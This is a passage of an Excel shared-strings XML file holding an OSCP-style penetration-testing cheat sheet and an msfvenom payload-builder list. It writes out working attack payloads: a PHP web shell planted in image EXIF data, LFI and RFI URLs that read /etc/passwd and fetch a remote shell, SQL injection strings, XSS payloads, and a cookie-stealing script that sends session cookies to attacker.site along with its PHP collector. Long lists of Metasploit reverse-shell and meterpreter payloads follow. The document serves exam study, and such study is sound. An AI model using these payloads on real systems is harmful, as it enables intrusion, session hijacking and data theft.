        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>Image file injection</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
You can inject PHP code into the exif data of an image with exiftool:
    exiftool -Comment='&lt;?php system($_GET['cmd']); ?&gt;' image.jpg
Then rename the image to 'image.jpg.php' or 'image.php.jpg' (theories differ. Try both.)</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <t>File inclusion (LFI / RFI)</t>
  </si>
  <si>
    <t xml:space="preserve">http://victim.site/articles.php?id=../../../../../../../../../../etc/passwd
</t>
  </si>
  <si>
    <t>Directory traversal not always required or available</t>
  </si>
  <si>
    <t xml:space="preserve">http://victim.site/articles.php?id=http://192.168.119.166/shell.txt&amp;cmd=id
</t>
  </si>
  <si>
    <t xml:space="preserve">Ensure you use .txt for PHP RFI (otherwise it will execute on your machine). Note that the first parameter is passed in with '?' (article.php?id=) and the subsequent parameters are passed in with '&amp;' (&amp;cmd=id).
</t>
  </si>
  <si>
    <t xml:space="preserve">http://victim.site/articles.php?id=php://filter/convert.base64-encode/resource=/etc/passwd
</t>
  </si>
  <si>
    <t xml:space="preserve">base64 encode your LFI file read. Excellent for LFI-ing other php files without executing them so you can read their contents.
</t>
  </si>
  <si>
    <t>Brute forcing</t>
  </si>
  <si>
    <t xml:space="preserve">When using Hydra for a form post, grab the post data for the request and check it for inconsistencies (timestamp, etc). Leave as much of the request in as you can - you don't know what will cause the auth to fail. You might need to play with this - hydra is very finicky.
</t>
  </si>
  <si>
    <t>Use cewl to create a simple wordlist of the available pages. The PWK mutations section only talks about adding 00-99 to the end of simple wordlists. It's worth trying.</t>
  </si>
  <si>
    <t>SQL injection (SQLi)</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Detection:
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>http://victim.site/articles.php?id=1'    (causes error)
http://victim.site/articles.php?id=1' OR 'a'='a    (always true condition - display all articles)
http://victim.site/articles.php?id=1' OR 1=1 --    (comment remainder of command)
many others</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>In-band SQL injections:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
http://victim.site/articles.php?id=1' UNION SELECT null, null, null; --
http://victim.site/articles.php?id=1' UNION SELECT 'string', 1, 1; --
http://victim.site/articles.php?id=1' UNION SELECT @@version, 1, 1; --
</t>
    </r>
  </si>
  <si>
    <t>UNION in SQL is 'also do this'
Keep adding 'null' until the page displays correctly - you now know how many columns are in the table. You can then start determining the column types and injecting other requests.</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>Error based SQL injections:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
http://victim.site/articles.php?id=1 OR db_name(0)=1);--
‘Conversion failed when converting the nvarchar value ‘news_db’ to data type int’
http://victim.site/articles.php?id=1 OR db_name(1)=1);--
‘Conversion failed when converting the nvarchar value ‘master’ to data type int’
</t>
    </r>
  </si>
  <si>
    <t>For when the SQL application produces errors that are displayed on the webapp, providing information. In this example, the database names are leaking out through the app.</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">Blind SQL injections:
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">http://victim.site/articles.php?id=1 AND substring(db_name(0),1,1)=’n
</t>
    </r>
  </si>
  <si>
    <t>Determine content from the database by recursively testing for TRUE conditions. If the page renders correctly in this example, the first letter of the first database name is 'n'.</t>
  </si>
  <si>
    <t xml:space="preserve">http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
</t>
  </si>
  <si>
    <t>Cheatsheets for MySQL and MSSQL (SQL Server) injection commands.</t>
  </si>
  <si>
    <t>Cross-site scripting (XSS)</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Detection: 
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>URL: 	http://victim.site/login.php?name=Simon
Forum: 	Name: Simon &lt;h1&gt; test &lt;/h1&gt;</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <t>Used when the web application incorrectly handles user input, allowing the attacker to inject scripts into the site that are executed by a visitor to the site in the context of their browser. Not really useful for OSCP, but included here for completeness.</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>Reflected XSS:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
http://victim.site/login.php?name=&lt;script&gt;alert(1)&lt;/script&gt;
</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>Persistent XSS:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
Hey guys! Check out my cat! &lt;img src=bogus.jpg onerror=alert(1)&gt;
</t>
    </r>
  </si>
  <si>
    <t>As in, posted to a forum.</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>DOM based XSS:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
http://victim.site/page#1/&lt;script&gt;alert(1)&lt;/script&gt;
</t>
    </r>
  </si>
  <si>
    <t>When dynamic contect is rendered client side and never sent to the server</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>Session hijacking with XSS:</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
&lt;script&gt; var i=new Image(); i.src=”http://attacker.site/postcookie.php?monster=”%2bdocument.cookie; &lt;/script&gt;
postcookie.php
&lt;?php $myfile = fopen(“cookies.txt”, “a”); $cookie = $_GET[monster]; fwrite($myfile, $cookie); fclose($myfile); ?&gt;
</t>
    </r>
  </si>
  <si>
    <t>XSS can be used to steal session tokens, which can then be passed to the application to validate a session as the user.</t>
  </si>
  <si>
    <t>Cross-site request forgery (XSRF)</t>
  </si>
  <si>
    <t xml:space="preserve">Exploiting an active user session to perform actions on the website on the users behalf. Bob logs into his bank (victim.bank) and leaves the site without logging out. He then accesses (or is lured to) http://attacker.site which contains this script.
&lt;img src=“http://victim.bank/transfer.php?account=123456&amp;amount=500”&gt;
</t>
  </si>
  <si>
    <t>HTTP verb tampering</t>
  </si>
  <si>
    <t xml:space="preserve">Tampering with HTTP verbs can produce unexpected results, including (on a HTB machine) bypass of simple HTTP auth.
HTTP verbs: OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, CONNECT
More if WebDAV extensions are enabled: PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK
</t>
  </si>
  <si>
    <t>IP whitelisting bypass</t>
  </si>
  <si>
    <t xml:space="preserve">Some web applications that use IP whitelisting can be bypassed by including an X-Forwarded-For header
</t>
  </si>
  <si>
    <t>XML external entities (XXE) injection</t>
  </si>
  <si>
    <t>Current as at 2020-05-26</t>
  </si>
  <si>
    <t>Payload</t>
  </si>
  <si>
    <t>LHOST</t>
  </si>
  <si>
    <t>LPORT</t>
  </si>
  <si>
    <t>Arch</t>
  </si>
  <si>
    <t>Encoder</t>
  </si>
  <si>
    <t>NOPs</t>
  </si>
  <si>
    <t>Platform</t>
  </si>
  <si>
    <t>Iterations</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Bad characters </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF0D78B9"/>
        <rFont val="Bahnschrift"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">(please format as eg </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="5" tint="0.39997558519241921"/>
        <rFont val="Bahnschrift"/>
        <family val="2"/>
      </rPr>
      <t>\x00\x0a\x0d\x2b\</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF0D78B9"/>
        <rFont val="Bahnschrift"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
  </si>
  <si>
    <t>Format</t>
  </si>
  <si>
    <t>Outfile</t>
  </si>
  <si>
    <t>MSFVenom command</t>
  </si>
  <si>
    <t>msfvenom -p linux/x86/exec -a x86 -f elf -o sudoedit</t>
  </si>
  <si>
    <t>Launch metasploit with handler</t>
  </si>
  <si>
    <t>Payloads</t>
  </si>
  <si>
    <t>Helper</t>
  </si>
  <si>
    <t>Helper 2</t>
  </si>
  <si>
    <t>Helper 3</t>
  </si>
  <si>
    <t>Platforms</t>
  </si>
  <si>
    <t>linux/x86/exec</t>
  </si>
  <si>
    <t/>
  </si>
  <si>
    <t>x86</t>
  </si>
  <si>
    <t>elf</t>
  </si>
  <si>
    <t>aix/ppc/shell_bind_tcp</t>
  </si>
  <si>
    <t>aix</t>
  </si>
  <si>
    <t>cmd/brace</t>
  </si>
  <si>
    <t>asp</t>
  </si>
  <si>
    <t>aix/ppc/shell_find_port</t>
  </si>
  <si>
    <t>android</t>
  </si>
  <si>
    <t>cmd/echo</t>
  </si>
  <si>
    <t>x64</t>
  </si>
  <si>
    <t>aspx</t>
  </si>
  <si>
    <t>aix/ppc/shell_interact</t>
  </si>
  <si>
    <t>apple_ios</t>
  </si>
  <si>
    <t>cmd/generic_sh</t>
  </si>
  <si>
    <t>aspx-exe</t>
  </si>
  <si>
    <t>aix/ppc/shell_reverse_tcp</t>
  </si>
  <si>
    <t>brocade</t>
  </si>
  <si>
    <t>cmd/ifs</t>
  </si>
  <si>
    <t>axis2</t>
  </si>
  <si>
    <t>android/meterpreter/reverse_http</t>
  </si>
  <si>
    <t>bsd</t>
  </si>
  <si>
    <t>cmd/perl</t>
  </si>
  <si>
    <t>base32</t>
  </si>
  <si>
    <t>android/meterpreter/reverse_https</t>
  </si>
  <si>
    <t>bsdi</t>
  </si>
  <si>
    <t>cmd/powershell_base64</t>
  </si>
  <si>
    <t>base64</t>
  </si>
  <si>
    <t>android/meterpreter/reverse_tcp</t>
  </si>
  <si>
    <t>cisco</t>
  </si>
  <si>
    <t>cmd/printf_php_mq</t>
  </si>
  <si>
    <t>bash</t>
  </si>
  <si>
    <t>android/meterpreter_reverse_http</t>
  </si>
  <si>
    <t>generic/eicar</t>
  </si>
  <si>
    <t>c</t>
  </si>
  <si>
    <t>android/meterpreter_reverse_https</t>
  </si>
  <si>
    <t>freebsd</t>
  </si>
  <si>
    <t>generic/none</t>
  </si>
  <si>
    <t>csharp</t>
  </si>
  <si>
    <t>android/meterpreter_reverse_tcp</t>
  </si>
  <si>
    <t>hardware</t>
  </si>
  <si>
    <t>mipsbe/byte_xori</t>
  </si>
  <si>
    <t>dll</t>
  </si>
  <si>
    <t>android/shell/reverse_http</t>
  </si>
  <si>
    <t>hpux</t>
  </si>
  <si>
    <t>mipsbe/longxor</t>
  </si>
  <si>
    <t>dw</t>
  </si>
  <si>
    <t>android/shell/reverse_https</t>
  </si>
  <si>
    <t>irix</t>
  </si>
  <si>
    <t>mipsle/byte_xori</t>
  </si>
  <si>
    <t>dword</t>
  </si>
  <si>
    <t>android/shell/reverse_tcp</t>
  </si>
  <si>
    <t>java</t>
  </si>
  <si>
    <t>mipsle/longxor</t>
  </si>
  <si>
    <t>apple_ios/aarch64/meterpreter_reverse_http</t>
  </si>
  <si>
    <t>javascript</t>
  </si>
  <si>
    <t>php/base64</t>
  </si>
  <si>
    <t>elf-so</t>
  </si>
  <si>
    <t>apple_ios/aarch64/meterpreter_reverse_https</t>
  </si>
  <si>
    <t>juniper</t>
  </si>
  <si>
    <t>ppc/longxor</t>
  </si>
  <si>
    <t>exe</t>
  </si>
  <si>
    <t>apple_ios/aarch64/meterpreter_reverse_tcp</t>
  </si>
  <si>
    <t>linux</t>
  </si>
  <si>
    <t>ppc/longxor_tag</t>
  </si>
  <si>
    <t>exe-only</t>
  </si>
  <si>
    <t>apple_ios/aarch64/shell_reverse_tcp</t>
  </si>
  <si>
    <t>mainframe</t>
  </si>
  <si>
    <t>ruby/base64</t>
  </si>
  <si>
    <t>exe-service</t>
  </si>
  <si>
    <t>apple_ios/armle/meterpreter_reverse_http</t>
  </si>
  <si>
    <t>multi</t>
  </si>
  <si>
    <t>sparc/longxor_tag</t>
  </si>
  <si>
    <t>exe-small</t>
  </si>
  <si>
    <t>apple_ios/armle/meterpreter_reverse_https</t>
  </si>
  <si>
    <t>netbsd</t>
  </si>
  <si>
    <t>x64/xor</t>
  </si>
  <si>
    <t>hex</t>
  </si>
  <si>
    <t>apple_ios/armle/meterpreter_reverse_tcp</t>
  </si>
  <si>
    <t>netware</t>
  </si>
  <si>
    <t>x64/xor_context</t>
  </si>
  <si>
    <t>hta-psh</t>
  </si>
  <si>
    <t>bsd/sparc/shell_bind_tcp</t>
  </si>
  <si>
    <t>nodejs</t>
  </si>
  <si>
    <t>x64/xor_dynamic</t>
  </si>
  <si>
    <t>jar</t>
  </si>
  <si>
    <t>bsd/sparc/shell_reverse_tcp</t>
  </si>
  <si>
    <t>openbsd</t>
  </si>
  <si>
    <t>x64/zutto_dekiru</t>
  </si>
  <si>
    <t>bsd/vax/shell_reverse_tcp</t>
  </si>
  <si>
    <t>osx</t>
  </si>
  <si>
    <t>x86/add_sub</t>
  </si>
  <si>
    <t>js_be</t>
  </si>
  <si>
    <t>bsd/x64/exec</t>
  </si>
  <si>
    <t>php</t>
  </si>
  <si>
    <t>x86/alpha_mixed</t>
  </si>
  <si>
    <t>js_le</t>
  </si>
  <si>
    <t>bsd/x64/shell_bind_ipv6_tcp</t>
  </si>
  <si>
    <t>python</t>
  </si>
  <si>
    <t>x86/alpha_upper</t>
  </si>
  <si>
    <t>jsp</t>
  </si>
  <si>
    <t>bsd/x64/shell_bind_tcp</t>
  </si>
  <si>
    <t>r</t>
  </si>
  <si>
    <t>x86/avoid_underscore_tolower</t>
  </si>
  <si>
    <t>loop-vbs</t>
  </si>
  <si>
    <t>bsd/x64/shell_bind_tcp_small</t>
  </si>
  <si>
    <t>ruby</t>
  </si>
  <si>
    <t>x86/avoid_utf8_tolower</t>
  </si>
  <si>
    <t>macho</t>
  </si>
  <si>
    <t>bsd/x64/shell_reverse_ipv6_tcp</t>
  </si>
  <si>
    <t>solaris</t>
  </si>
  <si>
    <t>x86/bloxor</t>
  </si>
  <si>
    <t>msi</t>
  </si>
  <si>
    <t>bsd/x64/shell_reverse_tcp</t>
  </si>
  <si>
    <t>unifi</t>
  </si>
  <si>
    <t>x86/bmp_polyglot</t>
  </si>
  <si>
    <t>msi-nouac</t>
  </si>
  <si>
    <t>bsd/x64/shell_reverse_tcp_small</t>
  </si>
  <si>
    <t>unix</t>
  </si>
  <si>
    <t>x86/call4_dword_xor</t>
  </si>
  <si>
    <t>num</t>
  </si>
  <si>
    <t>bsd/x86/exec</t>
  </si>
  <si>
    <t>unknown</t>
  </si>
  <si>
    <t>x86/context_cpuid</t>
  </si>
  <si>
    <t>osx-app</t>
  </si>
  <si>
    <t>bsd/x86/metsvc_bind_tcp</t>
  </si>
  <si>
    <t>windows</t>
  </si>
  <si>
    <t>x86/context_stat</t>
  </si>
  <si>
    <t>perl</t>
  </si>
  <si>
    <t>bsd/x86/metsvc_reverse_tcp</t>
  </si>
  <si>
    <t>x86/context_time</t>
  </si>
  <si>
    <t>pl</t>
  </si>
  <si>
    <t>bsd/x86/shell/bind_ipv6_tcp</t>
  </si>
  <si>
    <t>x86/countdown</t>
  </si>
  <si>
    <t>powershell</t>
  </si>
  <si>
    <t>bsd/x86/shell/bind_tcp</t>
  </si>
  <si>
    <t>x86/fnstenv_mov</t>
  </si>
  <si>
    <t>ps1</t>
  </si>
  <si>
    <t>bsd/x86/shell/find_tag</t>
  </si>
  <si>
    <t>x86/jmp_call_additive</t>
  </si>
  <si>
    <t>psh</t>
  </si>
  <si>
    <t>bsd/x86/shell/reverse_ipv6_tcp</t>
  </si>
  <si>
    <t>x86/nonalpha</t>
  </si>
  <si>
    <t>psh-cmd</t>
  </si>
  <si>
    <t>bsd/x86/shell/reverse_tcp</t>
  </si>
  <si>
    <t>x86/nonupper</t>
  </si>
  <si>
    <t>psh-net</t>
  </si>
  <si>
    <t>bsd/x86/shell_bind_tcp</t>
  </si>
  <si>
    <t>x86/opt_sub</t>
  </si>
  <si>
    <t>psh-reflection</t>
  </si>
  <si>
    <t>bsd/x86/shell_bind_tcp_ipv6</t>
  </si>
  <si>
    <t>x86/service</t>
  </si>
  <si>
    <t>py</t>
  </si>
  <si>
    <t>bsd/x86/shell_find_port</t>
  </si>
  <si>
    <t>x86/shikata_ga_nai</t>
  </si>
  <si>
    <t>bsd/x86/shell_find_tag</t>
  </si>
  <si>
    <t>x86/single_static_bit</t>
  </si>
  <si>
    <t>raw</t>
  </si>
  <si>
    <t>bsd/x86/shell_reverse_tcp</t>
  </si>
  <si>
    <t>x86/unicode_mixed</t>
  </si>
  <si>
    <t>rb</t>
  </si>
  <si>
    <t>bsd/x86/shell_reverse_tcp_ipv6</t>
  </si>
  <si>
    <t>x86/unicode_upper</t>
  </si>
  <si>
    <t>bsdi/x86/shell/bind_tcp</t>
  </si>
  <si>
    <t>x86/xor_dynamic</t>
  </si>
  <si>
    <t>sh</t>
  </si>
  <si>
    <t>bsdi/x86/shell/reverse_tcp</t>
  </si>
  <si>
    <t>vba</t>
  </si>
  <si>
    <t>bsdi/x86/shell_bind_tcp</t>
  </si>
  <si>
    <t>vba-exe</t>
  </si>
  <si>
    <t>bsdi/x86/shell_find_port</t>
  </si>
  <si>
    <t>vbapplication</t>
  </si>
  <si>
    <t>bsdi/x86/shell_reverse_tcp</t>
  </si>
  <si>
    <t>vba-psh</t>
  </si>
  <si>
    <t>cmd/mainframe/apf_privesc_jcl</t>
  </si>
  <si>
    <t>vbs</t>
  </si>
  <si>
    <t>cmd/mainframe/bind_shell_jcl</t>
  </si>
  <si>
    <t>vbscript</t>
  </si>
  <si>
    <t>cmd/mainframe/generic_jcl</t>
  </si>
  <si>
    <t>war</t>
  </si>
  <si>
    <t>cmd/mainframe/reverse_shell_jcl</t>
  </si>
  <si>
    <t>cmd/unix/bind_awk</t>
  </si>
  <si>
    <t>cmd/unix/bind_busybox_telnetd</t>
  </si>
  <si>
    <t>cmd/unix/bind_inetd</t>
  </si>
  <si>
    <t>cmd/unix/bind_jjs</t>
  </si>
  <si>
    <t>cmd/unix/bind_lua</t>
  </si>
  <si>
    <t>cmd/unix/bind_netcat</t>
  </si>
  <si>
    <t>cmd/unix/bind_netcat_gaping</t>
  </si>
  <si>
    <t>cmd/unix/bind_netcat_gaping_ipv6</t>
  </si>
  <si>
    <t>cmd/unix/bind_nodejs</t>
  </si>
  <si>
    <t>cmd/unix/bind_perl</t>
  </si>
  <si>
    <t>cmd/unix/bind_perl_ipv6</t>
  </si>
  <si>
    <t>cmd/unix/bind_r</t>
  </si>
  <si>
    <t>cmd/unix/bind_ruby</t>
  </si>
  <si>
    <t>cmd/unix/bind_ruby_ipv6</t>
  </si>
  <si>
    <t>cmd/unix/bind_socat_udp</t>
  </si>
  <si>
    <t>cmd/unix/bind_stub</t>
  </si>
  <si>
    <t>cmd/unix/bind_zsh</t>
  </si>
  <si>
    <t>cmd/unix/generic</t>
  </si>
  <si>
    <t>cmd/unix/interact</t>
  </si>
  <si>
    <t>cmd/unix/pingback_bind</t>
  </si>
  <si>
    <t>cmd/unix/pingback_reverse</t>
  </si>
  <si>
    <t>cmd/unix/reverse</t>
  </si>
  <si>
    <t>cmd/unix/reverse_awk</t>
  </si>
  <si>
    <t>cmd/unix/reverse_bash</t>
  </si>
  <si>
    <t>cmd/unix/reverse_bash_telnet_ssl</t>
  </si>
  <si>
    <t>cmd/unix/reverse_bash_udp</t>
  </si>
  <si>
    <t>cmd/unix/reverse_jjs</t>
  </si>
  <si>
    <t>cmd/unix/reverse_ksh</t>
  </si>
  <si>
    <t>cmd/unix/reverse_lua</t>
  </si>
  <si>
    <t>cmd/unix/reverse_ncat_ssl</t>
  </si>
  <si>
    <t>cmd/unix/reverse_netcat</t>
  </si>
  <si>
    <t>cmd/unix/reverse_netcat_gaping</t>
  </si>
  <si>
    <t>cmd/unix/reverse_nodejs</t>
  </si>
  <si>
    <t>cmd/unix/reverse_openssl</t>
  </si>
  <si>
    <t>cmd/unix/reverse_perl</t>
  </si>
  <si>
    <t>cmd/unix/reverse_perl_ssl</t>
  </si>
  <si>
    <t>cmd/unix/reverse_php_ssl</t>
  </si>
  <si>
    <t>cmd/unix/reverse_python</t>
  </si>
  <si>
    <t>cmd/unix/reverse_python_ssl</t>
  </si>
  <si>
    <t>cmd/unix/reverse_r</t>
  </si>
  <si>
    <t>cmd/unix/reverse_ruby</t>
  </si>
  <si>
    <t>cmd/unix/reverse_ruby_ssl</t>
  </si>
  <si>
    <t>cmd/unix/reverse_socat_udp</t>
  </si>
  <si>
    <t>cmd/unix/reverse_ssh</t>
  </si>
  <si>
    <t>cmd/unix/reverse_ssl_double_telnet</t>
  </si>
  <si>
    <t>cmd/unix/reverse_stub</t>
  </si>
  <si>
    <t>cmd/unix/reverse_tclsh</t>
  </si>
  <si>
    <t>cmd/unix/reverse_zsh</t>
  </si>
  <si>
    <t>cmd/windows/adduser</t>
  </si>
  <si>
    <t>cmd/windows/bind_lua</t>
  </si>
  <si>
    <t>cmd/windows/bind_perl</t>
  </si>
  <si>
    <t>cmd/windows/bind_perl_ipv6</t>
  </si>
  <si>
    <t>cmd/windows/bind_ruby</t>
  </si>
  <si>
    <t>cmd/windows/download_eval_vbs</t>
  </si>
  <si>
    <t>cmd/windows/download_exec_vbs</t>
  </si>
  <si>
    <t>cmd/windows/generic</t>
  </si>
  <si>
    <t>cmd/windows/powershell_bind_tcp</t>
  </si>
  <si>
    <t>cmd/windows/powershell_reverse_tcp</t>
  </si>
  <si>
    <t>cmd/windows/reverse_lua</t>
  </si>
  <si>
    <t>cmd/windows/reverse_perl</t>
  </si>
  <si>
    <t>cmd/windows/reverse_powershell</t>
  </si>
  <si>
    <t>cmd/windows/reverse_ruby</t>
  </si>
  <si>
    <t>firefox/exec</t>
  </si>
  <si>
    <t>firefox/shell_bind_tcp</t>
  </si>
  <si>
    <t>firefox/shell_reverse_tcp</t>
  </si>
  <si>
    <t>generic/custom</t>
  </si>
  <si>
    <t>generic/debug_trap</t>
  </si>
  <si>
    <t>generic/shell_bind_tcp</t>
  </si>
  <si>
    <t>generic/shell_reverse_tcp</t>
  </si>
  <si>
    <t>generic/tight_loop</t>
  </si>
  <si>
    <t>java/jsp_shell_bind_tcp</t>
  </si>
  <si>
    <t>java/jsp_shell_reverse_tcp</t>
  </si>
  <si>
    <t>java/meterpreter/bind_tcp</t>
  </si>
  <si>
    <t>java/meterpreter/reverse_http</t>
  </si>
  <si>
    <t>java/meterpreter/reverse_https</t>
  </si>
  <si>
    <t>java/meterpreter/reverse_tcp</t>
  </si>
  <si>
    <t>java/shell/bind_tcp</t>
  </si>
  <si>
    <t>java/shell/reverse_tcp</t>
  </si>
  <si>
    <t>java/shell_reverse_tcp</t>
  </si>
  <si>
    <t>linux/aarch64/meterpreter/reverse_tcp</t>
  </si>
  <si>
    <t>linux/aarch64/meterpreter_reverse_http</t>
  </si>
  <si>
    <t>linux/aarch64/meterpreter_reverse_https</t>
  </si>
  <si>
    <t>linux/aarch64/meterpreter_reverse_tcp</t>
  </si>
  <si>
    <t>linux/aarch64/shell/reverse_tcp</t>
  </si>
  <si>
    <t>linux/aarch64/shell_reverse_tcp</t>
  </si>
  <si>
    <t>linux/armbe/meterpreter_reverse_http</t>
  </si>
  <si>
    <t>linux/armbe/meterpreter_reverse_https</t>
  </si>
  <si>
    <t>linux/armbe/meterpreter_reverse_tcp</t>
  </si>
  <si>
    <t>linux/armbe/shell_bind_tcp</t>
  </si>
  <si>
    <t>linux/armle/adduser</t>
  </si>
  <si>
    <t>linux/armle/exec</t>
  </si>
  <si>
    <t>linux/armle/meterpreter/bind_tcp</t>
  </si>
  <si>
    <t>linux/armle/meterpreter/reverse_tcp</t>
  </si>
  <si>
    <t>linux/armle/meterpreter_reverse_http</t>
  </si>
  <si>
    <t>linux/armle/meterpreter_reverse_https</t>
  </si>
  <si>
    <t>linux/armle/meterpreter_reverse_tcp</t>
  </si>
  <si>
    <t>linux/armle/shell/bind_tcp</t>
  </si>
  <si>
    <t>linux/armle/shell/reverse_tcp</t>
  </si>
  <si>
    <t>linux/armle/shell_bind_tcp</t>
  </si>
  <si>
    <t>linux/armle/shell_reverse_tcp</t>
  </si>
  <si>
    <t>linux/mips64/meterpreter_reverse_http</t>
  </si>
  <si>
    <t>linux/mips64/meterpreter_reverse_https</t>
  </si>
  <si>
    <t>linux/mips64/meterpreter_reverse_tcp</t>
  </si>
  <si>
    <t>linux/mipsbe/exec</t>
  </si>
  <si>
    <t>linux/mipsbe/meterpreter/reverse_tcp</t>
  </si>
  <si>
    <t>linux/mipsbe/meterpreter_reverse_http</t>
  </si>
  <si>
    <t>linux/mipsbe/meterpreter_reverse_https</t>
  </si>
  <si>
    <t>linux/mipsbe/meterpreter_reverse_tcp</t>
  </si>
  <si>
    <t>linux/mipsbe/reboot</t>
  </si>
  <si>
    <t>linux/mipsbe/shell/reverse_tcp</t>
  </si>
  <si>
    <t>linux/mipsbe/shell_bind_tcp</t>
  </si>
  <si>
    <t>linux/mipsbe/shell_reverse_tcp</t>
  </si>
  <si>
    <t>linux/mipsle/exec</t>
  </si>
  <si>
    <t>linux/mipsle/meterpreter/reverse_tcp</t>
  </si>
  <si>
    <t>linux/mipsle/meterpreter_reverse_http</t>
  </si>
  <si>
    <t>linux/mipsle/meterpreter_reverse_https</t>
  </si>
  <si>
    <t>linux/mipsle/meterpreter_reverse_tcp</t>
  </si>
  <si>
    <t>linux/mipsle/reboot</t>
  </si>
  <si>
    <t>linux/mipsle/shell/reverse_tcp</t>
  </si>
  <si>
    <t>linux/mipsle/shell_bind_tcp</t>
  </si>
  <si>
    <t>linux/mipsle/shell_reverse_tcp</t>
  </si>
  <si>
    <t>linux/ppc/meterpreter_reverse_http</t>
  </si>
  <si>
    <t>linux/ppc/meterpreter_reverse_https</t>
  </si>
  <si>
    <t>linux/ppc/meterpreter_reverse_tcp</t>
  </si>
  <si>
    <t>linux/ppc/shell_bind_tcp</t>
  </si>
  <si>
    <t>linux/ppc/shell_find_port</t>
  </si>
  <si>
    <t>linux/ppc/shell_reverse_tcp</t>
  </si>
  <si>
    <t>linux/ppc64/shell_bind_tcp</t>
  </si>
  <si>
    <t>linux/ppc64/shell_find_port</t>
  </si>
  <si>
    <t>linux/ppc64/shell_reverse_tcp</t>
  </si>
  <si>
    <t>linux/ppc64le/meterpreter_reverse_http</t>
  </si>
  <si>
    <t>linux/ppc64le/meterpreter_reverse_https</t>
  </si>
  <si>
    <t>linux/ppc64le/meterpreter_reverse_tcp</t>
  </si>
  <si>
    <t>linux/ppce500v2/meterpreter_reverse_http</t>
  </si>
  <si>
    <t>linux/ppce500v2/meterpreter_reverse_https</t>
  </si>
  <si>
    <t>linux/ppce500v2/meterpreter_reverse_tcp</t>
  </si>
  <si>
    <t>linux/x64/exec</t>
  </si>
  <si>
    <t>linux/x64/meterpreter/bind_tcp</t>
  </si>
  <si>
    <t>linux/x64/meterpreter/reverse_tcp</t>
  </si>
  <si>
    <t>linux/x64/meterpreter_reverse_http</t>
  </si>
  <si>
    <t>linux/x64/meterpreter_reverse_https</t>
  </si>
  <si>
